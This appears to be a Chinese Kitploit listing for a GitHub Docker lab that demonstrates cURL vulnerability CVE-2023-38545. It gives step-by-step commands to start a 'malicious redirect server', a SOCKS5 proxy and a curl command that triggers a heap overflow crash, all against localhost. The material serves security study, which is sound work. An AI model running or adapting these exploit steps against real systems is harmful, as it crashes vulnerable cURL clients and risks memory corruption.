Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-38545-sample — 包含演示该漏洞利用所需的所有必要设置文件的 Dockerfile | Kitploit
工具/GitHubGitHub/vanigori/cve-2023-38545-sample
容器安全漏洞分析漏洞利用Web安全学习与教育实验室与实践
GitHubvanigori/cve-2023-38545-sample

CVE-2023-38545-sample

包含演示该漏洞利用所需的所有必要设置文件的 Dockerfile

查看仓库
322年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

快速描述

此项目演示了 cURL CVE-2023-38545。我已经尽可能地将其做得轻量。

设置

首先,构建 Docker 镜像:

docker build . -t cveimage

接下来,我们可以直接运行镜像文件,创建一个临时的 Docker 容器,该容器在停止后将被自动删除:

docker run --rm --tty --net="host" --name cvecontainer cveimage

如果你不方便输入命令,只需打开另一个终端并运行:

docker exec -it cvecontainer /bin/bash

现在,我们需要启动所有服务。连接到正在运行的容器,然后运行:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

现在,你可以在容器内看到 cURL 漏洞利用的实际效果:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

你必须在运行 curl 命令的机器上看到分段错误(segmentation fault)才能确认漏洞利用成功。如果未看到该错误,要么漏洞利用未发生,要么进程拥有过多的可用堆空间,导致你未能覆盖到不可访问的内存。

更多工作(欢迎提交 PR)

  • 美化此 README
  • 配置 systemd 以自动启动漏洞利用代码
  • 减少 Docker 镜像的构建时间和大小
  • 其他任何事项……?

参考

  • socks5 代理并非自行编写。该代理的原始代码可在此处找到:https://github.com/alexbers/tgsocksproxy
    • 最初在带有 systemd 支持的 ubuntu (wsl) 中被利用:https://github.com/aire1/mtproxy_autoinstaller
  • 这份 HackerOne 报告节省了大量研究时间。如果你想了解此漏洞是如何发生的,请通读此文:https://hackerone.com/reports/2187833
下载工具